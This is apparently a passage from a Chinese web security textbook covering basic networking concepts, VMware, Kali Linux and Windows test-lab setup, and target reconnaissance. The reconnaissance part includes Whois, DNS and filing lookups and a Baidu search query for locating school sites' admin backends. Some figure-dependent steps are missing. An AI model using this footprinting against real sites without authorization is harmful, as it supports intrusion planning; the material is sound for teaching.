第1章  Web安全快速入门
随着信息时代的发展和网络的普及，越来越多的人走进了网络生活，然而人们在享受网络带来便利的同时，也时刻面临着黑客们残酷攻击的危险。本章介绍 Web安全的相关技术信息，主要内容包括什么是 Web安全、Web应用程序的安全与风险、网络中的相关概念、网络通信的相关协议、IP地址、MAC地址、端口、系统进程等。 
1.1.什么是 Web安全
随着社交网络、微博、微信等一系列新型的互联网产品的诞生，基于 Web环境的互联网应用越来越广泛，企业信息化的过程中各种应用都架设在 Web平台上， Web业务的迅速发展也引起了黑客的强烈关注，接踵而至的就是 Web安全问题。 
1.1.1.Web安全概述
在 Web安全问题中，黑客常常利用操作系统的漏洞和 Web服务程序的 SQL注入漏洞等得到 Web服务器的控制权限，轻则篡改网页内容，重则窃取重要内容数据，更为严重的则是在网页中植入恶意代码，使得网站访问者受到侵害，这也使得越来越多的用户关注应用层的安全问题，对 Web应用安全的关注度也逐渐升温，“Web安全”的概念由此提出。
最初， Web安全主要是指计算机安全。不过，随着万维网上 Java语言的普及，利用 Java语言进行传播和获取资料的病毒开始出现，最为典型的代表就是 Java Snake病毒，还有一些利用邮件服务器进行传播和破坏的病毒，这些病毒会严重影响互联网的效率。
进入 21世纪以来，随着互联网的飞速发展，各种 Web应用开始增多，“计算机安全”逐步演化为“计算机信息系统安全”。这时，“安全”的概念也不再仅仅是计算机本身的安全，也包括软件与信息内容的安全。 
1.1.2.Web安全的发展历程
通俗地讲，互联网就是网络与网络之间串连成的庞大网络，自互联网诞生起，互联网的发展大致经历了三个阶段，分别为： Web 1.0、Web 2.0和 Web 3.0。相对应地， Web安全的发展历程也经历了三个阶段。 
1. 宣传启蒙阶段
第一代互联网 Web 1.0。从 1995年至 2005年，大约十年的时间，Web 1.0是只读互联网，用户只

在此阶段， Web安全逐渐被人们重视起来。许多企事业单位开始把信息安全作为系统建设中的重要内容之一来对待，加大了投入，开始建立专门的安全部门来开展信息安全工作。还有一个重要的变化就是，一些学校和研究机构开始将信息安全作为大学教程和研究课题，安全人才的培养开始起步。这也是我国安全产业发展的重要标志。 

3. 逐步正规阶段
第三代互联网 Web 3.0。与 Web 1.0和 2.0相比， Web 3.0最大的不同是去中心化。说到去中心化，就会想到区块链， Web 3.0是基于区块链技术建立的点对点的去中心化的智能互联网，目前处于基础建设时期，包括分布式存储、物联网、生态公链、云计算等方面。 Web 3.0将区块链的加密、不可篡改、点对点传输和共识算法技术添加到应用程序中，开发出去中心化的应用程序 DAPP。图 1-3所示为物联网相关示意图。

图 1-3 物联网示意图 
Web 3.0将更加以人为本，更加倾向于保护隐私，将数据回归到个人所有，逐渐摆脱中心化机构的控制。当下正处于 Web 2.0和 3.0的交接阶段，新的时代必定带来新的机遇。
在此阶段，随着互联网的高速发展，我国安全产业进入快速发展阶段，逐步走向正规。而标志安全产业走向正轨的重要特征，就是国家高层领导开始重视信息安全工作，并为此出台了一系列重要政策和措施。
综观多年的安全发展史，我们不难发现，其实一直都是安全在被动局面下的转变过程。面对安全威胁的层出不穷，想做到安全的主动防御是相当困难的，因此必须保持这种动态发展规则，了解安全本身的发展和变化，才能采取正确的对策。 
1.1.3.Web安全的发展现状
“没有网络安全就没有国家安全”。可以看出网络安全已经全面渗透到政治、经济、文化等领域。高度重视网络安全力量建设已经成为维护网络空间主权、安全和发展利益的必由之路。
随着各行各业信息化的不断推进，互联网的不安全因素也在逐日扩张，病毒木马、垃圾邮件、间谍软件等也在困扰着所有网络用户，这也让企业认识到网络安全的重要性。然而在网络安全产品的选择上，很多企业却显得无所适从，因为目前的网络安全市场正可谓是群雄并起、各成一家。这一现象表明，目前的网络安全市场似乎还未成熟。
尽管网络安全产品市场错综复杂，但是网络安全市场的增长是有目共睹的。从国内市场上看，由于目前网络安全行业还未出现领导者，专业公司比较少，整个行业呈现一片蓬勃的生机。另外，网络安全核心技术具有的较大的不可模仿性，使得行业从整体上看仍然属于卖方市场，这也是目前 Web安全的发展现状。


1.2.4.IP地址与 MAC地址 
IP地址用于在 TCP/IP通信协议中标记每台计算机的地址，通常使用十进制来表示，如 
192.168.1.100，但在计算机内部， IP地址是一个 32位的二进制数值，如 11000000 10101000 00000001 00000110（192.168.1.6）。 MAC地址与网络无关，也即无论将带有这个地址的硬件（如网卡、集线器、路由器等）接入到网络的何处，都是相同的 MAC地址，它由厂商写在网卡的 BIOS里。 
MAC地址通常表示为 12个十六进制数，每 2个十六进制数之间用冒号隔开，如： 08:00:20:0A:8C:6D就是一个 MAC地址，其中前 6位（08:00:20）代表网络硬件制造商的编号，它由 IEEE分配，而后 3位（0A:8C:6D）代表该制造商所制造的某个网络产品（如网卡）的系列号。每个网络制造商必须确保它所制造的每个以太网设备前 3个字节都相同，后 3个字节不同，这样，就可以保证世界上每个以太网设备都具有唯一的 MAC地址。
提示： IP地址与 MAC地址的区别在于：IP地址基于逻辑，比较灵活，不受硬件限制，也容易记忆。MAC地址在一定程度上与硬件一致，基于物理，能够具体标识。这两种地址均有各自的长处，使用时也因条件不同而采取不同的地址。 
1.2.5.上传和下载
上传（ Upload）是从本地计算机（一般称客户端）向远程服务器（一般称服务器端）传送数据的行为和过程。下载（Download）是从远程服务器取回数据到本地计算机的过程。 


1.3.认识网络通信协议
“网络通信协议”是计算机网络的一个重要组成部分，是不同网络之间通信、“交流”的公共语言。有了它，使用不同系统的计算机或网络之间才可以彼此识别，识别出不同的网络操作指令，建立信任关系。 
1.3.1.HTTP 
HTTP（Hyper Text Transfer Protocol，超文本传输协议）是访问万维网使用的核心通信协议，也是今天所有 Web应用程序使用的通信协议。 HTTP协议运行在 TCP之上，用于指定客户端可能发送给服务器什么样的消息以及得到什么样的响应，这个简单模型是早期 Web成功的有功之臣，因为它使开发和部署非常地直截了当。 
1.3.2.TCP/IP 
TCP/IP协议包括两个子协议，即 TCP协议（ Transmission Control Protocol，传输控制协议）和 IP协议（ Internet Protocol，因特网协议）。在这两个子协议中又包括许多应用型的协议和服务，使得 TCP/IP协议的功能非常强大。 
TCP/IP协议中除了包括 TCP、IP两个协议外，还包括许多子协议。它的核心协议包括用户数据报协议（UDP）、地址解析协议（ ARP）及因特网控制消息协议（ICMP）等。 
1.3.3.IP 
IP协议，即互联网协议（ Internet Protocol），可实现两个基本功能：寻址和分段。 IP协议可以





第章
2




搭建 Web安全测试环境
安全测试环境是安全工作者需要了解和掌握的内容。对于 Web安全初学者来说，在学习过程中需要找到符合条件的目标计算机，并进行模拟攻击，而这些攻击目标并不是初学者能够从网络上搜索到的，这就需要通过搭建 Web安全测试环境来解决这个问题。本章介绍 Web安全测试环境的搭建，主要内容包括虚拟机的创建、Kali Linux操作系统的创建等。 
2.1.认识安全测试环境
所谓安全测试环境就是在已存在的一个系统中，利用虚拟机工具创建出的一个内在的虚拟系统。该系统与外界独立，但与已存在的系统建立有网络关系，在该系统中可以进行测试和模拟黑客入侵方式。 
2.1.1.什么是虚拟机软件
虚拟机软件是一种可以在一台计算机上模拟出很多台计算机的软件，每台计算机都可以运行独立的操作系统，且不相互干扰，实现了一台“计算机”运行多个操作系统的功能，同时还可以将这些操作系统连成一个网络。
常见的虚拟机软件有 VMware和 Virtual PC两种。 VMware是一款功能强大的桌面虚拟计算机软件，支持在主机和虚拟机之间共享数据，支持第三方预设置的虚拟机和镜像文件，而且安装与设置都非常简单。 
Virtual PC具有最新的 Microsoft虚拟化技术。用户可以使用这款软件在同一台计算机上同时运行多个操作系统。操作 Virtual PC非常简单，用户只需单击一下，便可直接在计算机上虚拟出 Windows环境，在该环境中可以同时运行多个应用程序。 
2.1.2.什么是虚拟系统
虚拟系统就是在已有的操作系统的基础上，安装一个新的操作系统或者虚拟出系统本身的文件，该操作系统允许在不重启计算机的基础上进行切换。
创建虚拟系统的好处有以下几种。 
●	虚拟技术是一种调配计算机资源的方法，可以更有效、更灵活地提供和利用计算机资源，降低成本，节省开支。

●	在虚拟环境里更容易实现程序自动化，有效地减少了测试要求和应用程序的兼容性问题，在系统崩溃时更容易实施恢复操作。 

●	虚拟系统允许跨系统进行安装，如在 Windows 10的基础上可以安装 Linux操作系统。 




2.2.安装与创建虚拟机
对于无线安全初学者，使用虚拟机构建无线测试环境是一个非常好的选择，这样既可以快速搭建测试环境，也可以快速还原之前快照，避免错误操作造成系统崩溃。 
2.2.1.下载虚拟机软件
使用虚拟机之前，需要从官网上下载虚拟机软件 VMware，具体的操作步骤如下。 
微视频
Step01使用浏览器打开虚拟机官方网站 https://my.vmware.com/cn，进入虚拟机官网页面，如图 2-1所示。

图 2-1 虚拟机官网页面 

Step02用户需要注册一个账号，注册完成后，进入所有下载页面，并切换到“所有产品”选项卡，
如图 2-2所示。

图 2-2 “所有产品”选项卡 

Step03在下拉页面中找到 VMware Workstation Pro选项，单击右侧的“查看下载组件”超链接，
如图 2-3所示。

图 2-3 “查看下载组件”超链接 

Step04进入 VMware下载页面，在其中选择 Windows版本，单击“立即下载”超链接，如图 2-4
所示。 

Step05弹出“新建下载任务”对话框，单击“下载”按钮进行下载，如图 2-5所示。


　　

　　　图 2-4 VMware下载页面图 2-5 “新建下载任务”对话框 
2.2.2.安装虚拟机软件
虚拟机软件下载完成后，接下来就可以安装虚拟机软件了，这里下载的是目前最新版本 

VMware-workstation-full-16.2.3-19376536.exe，用户可根据实际情况选择当前最新版本下载即可。安微视频装虚拟机的具体操作步骤如下。 

Step01双击下载的 VMware安装软件，进入“欢迎使用 VMware Workstation Pro安装向导”
窗口，如图 2-6所示。 

Step02单击“下一步”按钮，进入“最终用户许可协议”窗口，勾选“我接受许可协议中的条
款”复选框，如图 2-7所示。


　　

图 2-6 “欢迎使用 VMware Workstation Pro安装向导”窗口图 2-7 “最终用户许可协议”窗口 

Step03单击“下一步”按钮，进入“自定义安装”窗口，在其中可以更改安装路径，也可以保
持默认路径，如图 2-8所示。 

Step04单击“下一步”按钮，进入“用户体验设置”窗口，这里采用系统默认设置，如图 2-9所示。



　　
图 2-8 “自定义安装”窗口图 2-9 “用户体验设置”窗口
13

Step05单击“下一步”按钮，进入“快捷方式”窗口，在其中可以创建用户快捷方式，这里可
以保持默认设置，如图 2-10所示。 

Step06单击“下一步”按钮，进入“已准备好安装 VMware Workstation Pro”窗口，开始准备
安装虚拟机软件，如图 2-11所示。

　　

图 2-10 “快捷方式”窗口图 2-11 “已准备好安装 VMware Workstation Pro”窗口 

Step07单击“安装”按钮，等待一段时间后虚拟机便可以安装完成，并进入“ VMware 
Workstation Pro安装向导已完成”窗口，单击“完成”按钮，关闭虚拟机安装向导，如图 2-12所示。 

Step08虚拟机安装完成并重新启动系统后，如图 2-13所示，才可以使用虚拟机。至此，便完
成了 VMware虚拟机的下载与安装。

　　


图 2-12 “VMware Workstation Pro安装向导已完成”窗口图 2-13 重新启动系统 

2.2.3.创建虚拟机系统
安装完虚拟机以后，就需要创建一台真正的虚拟机，为后续的测试系统做准备。创建虚拟机的
微视频具体操作步骤如下。 

Step01双击桌面安装好的 VMware虚拟机图标，打开 VMware虚拟机软件，如图 2-14所示。 

Step02单击“创建新的虚拟机”按钮，进入“新建虚拟机向导”对话框，在其中选中“自定义”
单选按钮，如图 2-15所示。 

Step03单击“下一步”按钮，进入“选择虚拟机硬件兼容性”对话框，在其中设置虚拟机的硬
件兼容性，这里采用默认设置，如图 2-16所示。


　　

　　图 2-14 VMware虚拟机软件图 2-15 “新建虚拟机向导”对话框 

Step04单击“下一步”按钮，进入“安装客户机操作系统”对话框，在其中选中“稍后安装操
作系统”单选按钮，如图 2-17所示。


　　

　　　图 2-16 “选择虚拟机硬件兼容性”对话框图 2-17 “安装客户机操作系统”对话框 

Step05单击“下一步”按钮，进入“选择客户机操作系统”对话框，在其中选中 Linux单选按钮，
如图 2-18所示。 

Step06单击“版本”下方的下拉按钮，在弹出的下拉列表中选择“其他 Linux 5.x内核 64位”
版本系统，这里的系统版本与主机系统版本无关，可以自由选择，如图 2-19所示。



　　
图 2-18 “选择客户机操作系统”对话框图 2-19 选择系统版本

Step07单击“下一步”按钮，进入“命名虚拟机”对话框，在“虚拟机名称”文本框中输入虚
拟机名称，在“位置”中选择一个存放虚拟机的磁盘位置，如图 2-20所示。 

Step08单击“下一步”按钮，进入“处理器配置”对话框，在其中选择“处理器数量”，一般
普通计算机都是单处理，所以这里不用设置；“处理器内核总数”可以根据实际处理器内核数量设置，如图 2-21所示。


　　
图 2-20 “命名虚拟机”对话框图 2-21 “处理器配置”对话框 

Step09单击“下一步”按钮，进入“此虚拟机的内存”对话框，根据实际主机进行设置，内存
不要低于 768MB，这里选择 2048MB也就是 2GB内存，如图 2-22所示。 

Step10单击“下一步”按钮，进入“网络类型”对话框，这里选中“使用网络地址转换（ NAT）”
单选按钮，如图 2-23所示。

　　

图 2-22 “此虚拟机的内存”对话框图 2-23 “网络类型”对话框 

Step11单击“下一步”按钮，进入“选择 I/O控制器类型”对话框，这里选中 LSI Logic单选按钮，如图 2-24所示。 

Step12单击“下一步”按钮，进入“选择磁盘类型”对话框，这里选中 SCSI单选按钮，如图 2-25
所示。 

Step13单击“下一步”按钮，进入“选择磁盘”对话框，这里选中“创建新虚拟磁盘”单选按钮，
如图 2-26所示。 

Step14单击“下一步”按钮，进入“指定磁盘容量”对话框，这里“最大磁盘大小”设置 8GB
空间即可，选中“将虚拟盘拆分成多个文件”单选按钮，如图 2-27所示。

　　

图 2-24 “选择 I/O控制器类型”对话框图 2-25 “选择磁盘类型”对话框


　　
图 2-26 “选择磁盘”对话框图 2-27 “指定磁盘容量”对话框 

Step15单击“下一步”按钮，进入“指定磁盘文件”对话框，这里保持默认设置即可，如图 2-28所示。 

Step16单击“下一步”按钮，进入“已准备好创建虚拟机”对话框，如图 2-29所示。

　　

图 2-28 “指定磁盘文件”对话框图 2-29 “已准备好创建虚拟机”对话框 

Step17单击“完成”按钮，至此，便创建了一个新的虚拟机，如图 2-30所示。以上操作相当
于组装了一台裸机，其硬件设备可以根据实际需求再进行更改。

图 2-30 创建新的虚拟机 

2.3.安装 Kali Linux操作系统
现实中组装好计算机以后需要给它安装一个操作系统，这样计算机才可以正常工作，虚拟机也一样，同样需要安装一个操作系统。本节介绍如何安装 Kali Linux操作系统。 
2.3.1.下载 Kali Linux 
Kali Linux是基于 Debian的 Linux发行版，设计用于数字取证操作系统。下载 Kali Linux的具
微视频体操作步骤如下。 
Step01在浏览器中输入 Kali Linux系统的网址 https://www.kali.org，打开 Kali官方网站，如图 2-31所示。 


　　


图 2-31 Kali官方网站图 2-32 选择 Kail Linux版本 


“下载”按钮，即可开始下载 Kail Linux，并显示下载进度，如图 2-33所示。
图 2-33 下载进度

2.3.2.安装 Kali Linux
架设好虚拟机并下载好 Kali Linux后，接下来便可以安装 Kali Linux了。安装 Kali Linux的具

体操作步骤如下。 微视频
Step01打开安装好的虚拟机，单击 CD/DVD选项，如图 2-34所示。 

Step02在打开的“虚拟机设置”页面中选中“使用 ISO映像文件”单选按钮，如图 2-35所示。



　　
图 2-34 CD/DVD选项图 2-35 “虚拟机设置”对话框 

Step03单击“浏览”按钮，打开“浏览 ISO映像”对话框，在其中选择下载好的系统映像文件，
如图 2-36所示。 

Step04单击“打开”按钮，返回虚拟机设置页面，单击“开启此虚拟机”选项，便可以启动虚
拟机，如图 2-37所示。

　　


图 2-36 “浏览 ISO映像”对话框图 2-37 虚拟机设置页面 

Step05启动虚拟机后会进入启动选项页面，用户可以通过上下键选择 Graphical Install选项，如图 2-38所示。 

Step06选择完毕后，按 Enter键，进入语言选择页面，这里选择简体中文选项，如图 2-39所示。
19


　　

图 2-38 选择 Graphical Install选项　　　　图 2-39 语言选择页面 

Step07单击 Continue按钮，进入语言确认页面，保持系统默认设置，如图 2-40所示。 

Step08单击“继续”按钮，进入“请选择您的区域”页面，它会自动上网匹配，即使不正确也
没有关系，系统安装完成后还可以调整，这里保持默认设置，如图 2-41所示。


　　


图 2-40 语言确认页面图 2-41 “请选择您的区域”页面 

Step09单击“继续”按钮，进入“配置键盘”页面，同样系统会根据语言选择来自行匹配，这
里保持默认设置，如图 2-42所示。 

Step10单击“继续”按钮，按照安装步骤的提示就可以完成 Kali Linux的安装了。图 2-43所示
为安装基本系统界面。



　　
图 2-42 “配置键盘”页面图 2-43 安装基本系统界面

Step11系统安装完成后，会提示用户重启进入系统，如图 2-44所示。 

Step12按下 Enter键，安装完成后重启，进入“用户名”页面，在其中输入 root管理员账号，如
图 2-45所示。

　　


　　图 2-44 安装完成图 2-45 “用户名”页面 

Step13单击“下一步”按钮，进入登录密码页面，在其中输入设置好的管理员密码，如图 2-46
所示。 

Step14单击“登录”按钮，至此便完成了整个 Kail Linux系统的安装工作，如图 2-47所示。

　　


　　图 2-46 输入密码图 2-47 Kail Linux系统页面 
2.3.3.更新 Kali Linux
初始安装的 Kali Linux如果不及时更新是无法使用的，下面介绍更新 Kali Linux的方法与

步骤。 微视频

Step01双击桌面上 Kali Linux的终端黑色图标，如图 2-48所示。 

Step02打开 Kali Linux的终端设置界面，在其中输入命令 apt update，然后按 Enter键，即可获取需要更新软件的列表，如图 2-49所示。



　　　　　

图 2-48 Kali Linux图标图 2-49　需要更新软件的列表
21

Step03如果有需要更新的软件，可以运行 apt upgrade命令，如图 2-50所示。 

Step04运行命令后会有一个提示，此时按 Y键，即可开始更新，如图 2-51所示。

　　


图 2-50 apt upgrade命令　　　　图 2-51 开始更新
注意：由于网络原因可能需要多执行几次更新命令，直至更新完成。另外，如果个别软件已经安装存在升级版本问题，如图 2-52所示，这时可以先卸载旧版本。运行“apt-get remove <软件名 >”命令，如图 2-53所示，此时按 Y键即可卸载旧版本。

图 2-52 升级版本问题

图 2-53 卸载旧版本
卸载完旧版本后，可以运行“ apt-get install <软件名 >”命令，如图 2-54所示，此时按 Y键即可开始安装新版本。

图 2-54 安装新版本
最后，再次运行 apt upgrade命令，如果显示无软件需要更新，此时系统更新完成，如图 2-55所示。

图 2-55 系统更新完成 

2.4.安装 Windows操作系统和 VMware Tools工具
现实中组装好计算机以后需要给它安装一个系统，这样计算机才可以正常工作。虚拟机也一样，同样需要安装一个操作系统，如 Windows、Linux等，这样才能使用虚拟机创建的环境来实现网络安全测试。 
2.4.1.安装 Windows操作系统
在虚拟机中安装 Windows操作系统是搭建网络安全测试环境的重要步骤。所有准备工作就绪后，接下来就可以在虚拟机中安装 Windows操作系统了。具体操作步骤如下。 

Step01双击桌面安装好的 VMware虚拟机图标，打开 VMware虚拟机软件，如图 2-56所示。 

Step02单击“创建新的虚拟机”按钮，进入“欢迎使用新建虚拟机向导”对话框，在其中选中“自
定义”单选按钮，如图 2-57所示。


　　


　　图 2-56 VMware虚拟机软件图 2-57 “欢迎使用新建虚拟机向导”对话框 

Step03单击“下一步”按钮，进入“选择虚拟机硬件兼容性”对话框，在其中设置虚拟机的硬
件兼容性，这里采用默认设置，如图 2-58所示。 

Step04单击“下一步”按钮，进入“安装客户机操作系统”对话框，在其中选中“稍后安装操
作系统”单选按钮，如图 2-59所示。 

Step05单击“下一步”按钮，进入“选择客户机操作系统”对话框，在其中选中 Microsoft 
Windows单选按钮，如图 2-60所示。 

Step06单击“版本”下方的下拉按钮，在弹出的下拉列表中选择 Windows 10 x64版本系统，
这里的系统版本与主机系统版本无关，可以自由选择，如图 2-61所示。

　　

　　　图 2-58 “选择虚拟机硬件兼容性”对话框　图 2-59 “安装客户机操作系统”对话框

　　　


　　　图 2-60 “选择客户机操作系统”对话框图 2-61 选择系统版本 

Step07单击“下一步”按钮，进入“命名虚拟机”对话框，在“虚拟机名称”文本框中输入虚
拟机名称，在“位置”中选择一个存放虚拟机的磁盘位置，如图 2-62所示。 

Step08单击“下一步”按钮，进入“处理器配置”对话框，在其中选择“处理器数量”，一般
普通计算机都是单处理，所以这里不用设置；“处理器内核总数”可以根据实际处理器内核数量设置，如图 2-63所示。


　　
图 2-62 “命名虚拟机”对话框图 2-63 “处理器配置”对话框

Step09单击“下一步”按钮，进入“此虚拟机的内存”对话框，根据实际主机进行设置，内存
不要低于 768MB，这里选择 1024MB也就是 1GB内存，如图 2-64所示。 

Step10单击“下一步”按钮，进入“网络类型”对话框，这里选中“使用网络地址转换（ NAT）”
单选按钮，如图 2-65所示。

　　

图 2-64 “此虚拟机的内存”对话框图 2-65 “网络类型”对话框 

Step11单击“下一步”按钮，进入“选择 I/O控制器类型”对话框，这里选中 LSI Logic SAS单选按钮，如图 2-66所示。 

Step12单击“下一步”按钮，进入“选择磁盘类型”对话框，这里选中 NVMe单选按钮，如图 2-67
所示。

　　

　　　图 2-66 “选择 I/O控制器类型”对话框图 2-67 “选择磁盘类型”对话框 

Step13单击“下一步”按钮，进入“选择磁盘”对话框，这里选中“创建新虚拟磁盘”单选按钮，
如图 2-68所示。 

Step14单击“下一步”按钮，进入“指定磁盘容量”对话框，这里最大磁盘大小设置 60GB空
间即可，选中“将虚拟盘拆分成多个文件”单选按钮，如图 2-69所示。 

Step15单击“下一步”按钮，进入“指定磁盘文件”对话框，这里保持默认设置即可，如图 2-70
所示。 

Step16单击“下一步”按钮，进入“已准备好创建虚拟机”对话框，如图 2-71所示。

　　

　　图 2-68 “选择磁盘”对话框图 2-69 “指定磁盘容量”对话框

　　

图 2-70 “指定磁盘文件”对话框图 2-71 “已准备好创建虚拟机”对话框 

Step17单击“完成”按钮，至此，便创建了一个新的虚拟机，如图 2-72所示。以上操作相当
于组装了一台裸机，其中的硬件设配可以根据实际需求再进行更改。 

Step18单击“开启此虚拟机”链接，稍等片刻， Windows 10操作系统进入安装窗口，如图 2-73
所示。


　　
图 2-72 创建的新虚拟机图 2-73 安装窗口

Step19按任意键，即可打开 Windows安装程序运行界面，安装程序将开始自动复制安装的文
件并准备要安装的文件，如图 2-74所示。 

Step20安装完成后，将显示安装后的操作系统界面，如图 2-75所示。至此，整个虚拟机创建完成，
安装的虚拟操作系统以文件的形式存放在硬盘之中。

　　

　　图 2-74 准备要安装的文件图 2-75 操作系统界面 
2.4.2.安装 VMware Tools工具
众所周知，本地计算机安装好操作系统之后，还需要安装各种驱动程序，如显卡、网卡等的驱动程序，虚拟机也需要安装一定的虚拟工具才能正常运行。安装 VMware Tools工具的操作步骤如下。 

Step01启动虚拟机进入虚拟系统，然后按 Ctrl+Alt组合键，切换到真实的系统，如图 2-76所示。
注意：如果是用 ISO文件安装的操作系统，最好重新加载该安装文件并重新启动系统，这样系统就能自动找到 VMware Tools的安装文件。 

Step02执行“虚拟机”→“安装 VMware Tools”命令，此时系统将自动弹出安装文件，如图 2-77
所示。

　　

　　图 2-76 进入虚拟系统图 2-77 “安装 VMware Tools”命令 

Step03安装文件启动之后，将会弹出“欢迎使用 VMware Tools的安装向导”窗口，如图 2-78
所示。 

Step04单击“下一步”按钮，进入“选择安装类型”窗口，根据实际情况选择相应的安装类型，
这里选中“典型安装”单选按钮，如图 2-79所示。

　　

图 2-78 “欢迎使用 VMware Tools的安装向导”窗口图 2-79 “选择安装类型”窗口 

Step05单击“下一步”按钮，进入“已准备好安装 VMware Tools”窗口，如图 2-80所示。 

Step06单击“安装”按钮，进入“正在安装 VMware Tools”窗口，在其中显示了 VMware Tools
工具的安装状态，如图 2-81所示。

　　

图 2-80 “已准备好安装 VMware Tools”窗口图 2-81 “正在安装 VMware Tools”窗口 

Step07安装完成后，进入“VMware Tools安装向导已完成”窗口，如图 2-82所示。 

Step08单击“完成”按钮，弹出一个信息提示框，要求必须重新启动系统，这样对 VMware 
Tools进行的配置更改才能生效，如图 2-83所示。



　　
　图 2-82 “VMware Tools安装向导已完成”窗口　　　图 2-83 信息提示框

Step09单击“是”按钮，系统即可自动启动，虚拟系统重新启动之后即可发现虚拟机工具已经成功安装，再次选择“虚拟机”命令，可以看到“安装 VMware Tools”命令变成了“重新安装 VMware Tools”命令，如图 2-84所示。 

2.5.实战演练 

图 2-84 “重新安装 VMware Tools”菜单命令

2.5.1.实战1：关闭开机多余启动项目
在计算机启动的过程中，自动运行的程序称为开机启动项，有时一些木马程序会在开机时就运

行，用户可以通过关闭开机启动项来提高系统安全性，具体的操作步骤如下。 微视频


　　　　


图 2-85 “任务管理器”选项图 2-86 “任务管理器”窗口 

如图 2-87所示。 

自启，如图 2-88所示。



　　
　　　图 2-87 “启动”选项卡图 2-88 禁止开机启动项
29

2.5.2.实战2：诊断和修复网络不通的问题
当自己的计算机不能上网时，说明计算机与网络连接不通，这时就需要诊断和修复网络了，具
微视频体的操作步骤如下。 

Step01打开“网络连接”窗口，右击需要诊断的网络图标，在弹出的快捷菜单中选择“诊断”
选项，弹出“Windows网络诊断”对话框，并显示网络诊断的进度，如图 2-89所示。 

Step02诊断完成后，将会在下方的窗格中显示诊断的结果，如图 2-90所示。

　　

　图 2-89 显示网络诊断的进度图 2-90 显示诊断的结果 

Step03单击“尝试以管理员身份进行这些修复”链接，即可开始对诊断出来的问题进行修复，
如图 2-91所示。 

Step04修复完毕后，会给出修复的结果，提示用户疑难解答已经完成，并在下方显示已修复
信息，如图 2-92所示。

　　

　　　图 2-91 修复网络问题图 2-92 显示已修复信息

第章
3





信息收集与踩点侦察
黑客在入侵之前，都会进行踩点以收集相关信息，在信息收集中，最重要的就是收集服务器的配置信息和网站的敏感信息，其中包括域名及子域名信息、确定扫描的范围以及获取相关服务与端口信息、CMS指纹以及目标网站的 IP地址等。本章介绍 Web安全之踩点侦察的相关知识。 
3.1.收集域名信息
在知道目标的域名之后，首先需要做的事情就是获取域名的注册信息，包括该域名的 DNS服务器信息、备案信息等。收集域名信息的常用方法有以下几种。 
3.1.1.Whois查询
一个网站在制作完毕后，要想发布到互联网上，还需要向有关机构申请域名，申请到的域名信

息将被保存到域名管理机构的数据库中，任何用户都可以进行查询，这就使黑客有机可乘了。因此，微视频踩点流程中就少不了查询 Whois。
（1）在中国互联网信息中心查询。

中国互联网信息中心是非常权威的域名管理机构，在该机构的数据库中记录着所有以 .cn为结尾的域名注册信息。查询 Whois的操作步骤如下。 

Step01在 Microsoft Edge浏览器的地址栏中输入中国互联网信息中心的网址 http://www.cnnic.net. cn/，即可打开其首页，如图 3-1所示。 

Step02在“查询”区域的文本框中输入要查询的中文域名，如这里输入“淘宝 .cn”，然后输入验证码，如图 3-2所示。 

“查询”按钮，打开“验证码”对话框，在“验证码”文本框中输入验证码，如图 3-3所示。 
Step04单击“确定”按钮，即可看到要查询域名的详细信息，如图 3-4所示。

图 3-1 中国互联网信息中心首页




　　

　　图 3-2 输入中文域名图 3-3 “验证码”对话框图 3-4 域名详细信息
（2）在万网查询。万网是中国最大的域名和网站托管服务提供商，它提供 .cn的域名注册信息，而且还可以查询 .com等域名信息。查询 Whois的操作步骤如下。 

Step01在 Microsoft Edge浏览器的地址栏中输入万网的网址 https://wanwang.aliyun.com/，即可打开其首页，如图 3-5所示。 

Step02在“域名”文本框中输入要查询的域名，然后单击“查询域名”按钮，即可看到相关的
域名信息，如图 3-6所示。

　　


图 3-5 万网首页图 3-6 域名详细信息 

Step03在域名信息右侧，单击“Whois信息”超链接，即可查看 Whois信息，如图 3-7所示。

图 3-7 Whois信息
3.1.2.DNS查询 
DNS即域名系统，是 Internet的一项核心服务。简单地说，利用 DNS服务系统可以将互联网上的域名与 IP地址进行域名解析，因此，计算机只认识 IP地址，不认识域名。该系统作为可以将域名和 IP地址相互转换的一个分布式数据库，能够帮助用户更为方便地访问互联网，而不用记住被机器直接读取的 IP地址。
目前，查询 DNS的方法比较多，常用的方式是使用 Windows系统自带的 nslookup工具来查询 DNS中的各种数据。下面介绍两种使用 nslookup查看 DNS的方法。
（1）使用命令行方式。该方式主要是用来查询域名对应的 IP地址，即查询 DNS的记录，通过该记录黑客可以查询该
域名的主机所存放的服务器，其命令格式为：nslookup域名。若想要查看 www.baidu.com对应的 IP信息，其具体的操作步骤如下。 
Step01打开“命令提示符”窗口，在其中输入 nslookup www.baidu.com命令，如图 3-8所示。 

Step02按 Enter键，即可得出其运行结果，在运行结果中可以看到“名称”和 Addresses行分别
对应域名和 IP地址，而最后一行显示的是目标域名并注明别名，如图 3-9所示。



　　
　图 3-8 输入命令图 3-9 查询域名和 IP地址
（2）交互式方式。可以使用 nslookup的交互模式对域名进行查询，具体的操作步骤如下。 
Step01在“命令提示符”窗口中运行 nslookup命令，然后按 Enter键，即可得出其运行结果，
如图 3-10所示。 
Step02在“命令提示符”窗口中输入命令 set type=mx，然后按 Enter键，进入命令运行状态，如图 3-11所示。



　　
图 3-10 运行 nslookup命令图 3-11 运行 set type=mx命令 

Step03在“命令提示符”窗口中再输入想要查看的网址（必须去掉 www），如 baidu.com，按
Enter键，即可得出百度网站的相关 DNS信息，即 DNS的 MX关联记录，如图 3-12所示。

图 3-12 查看 DNS信息 
3.1.3.备案信息查询
根据我国国家法律法规的规定，网站的所有者应向国家有关部门申请备案，即网站备案。这是国家有关部门对网站进行的管理，防止网站从事非法经营活动。常用的查询备案信息的网站有以下三个。
（1）ICP备案查询网：http://www.beianx.cn/。

（2）天眼查：https://www.tianyancha.com/。


（3）站长工具：https://icp.chinaz.com/。
图 3-13所示为在站长工具网站查询网址为 https://www.baidu.com/的备案信息。




图 3-13 网站备案信息 
3.1.4.敏感信息查询
百度是世界上流行的搜索引擎，对于一位 Web安全工作者而言，它可能是一款绝佳的查询工具。我们可以通过构造特殊的关键字语法来搜索互联网上的相关敏感信息。百度的常用语法及说明如表 3-1所示。
例如，想要搜索一些学校网站的后台，语法为“ site:edu.cn intext:后台管理”，意思是搜索网站正文中含有“后台管理”并且域名后缀是 edu.cn的网站，搜索结果如图 3-14所示。
表 3-1 百度的常用语法及其说明
关　键　字 说　　明  
site 指定域名  
inurl  URL中存在关键字的网页  
intext 网页正文中的关键字  
.letype 指定文件类型  
intitle 网页标题中的关键字  
link  link:baidu.com表示返回所有和 baidu.com做了链接的 URL  
info 查找指定站点的一些基本信息  
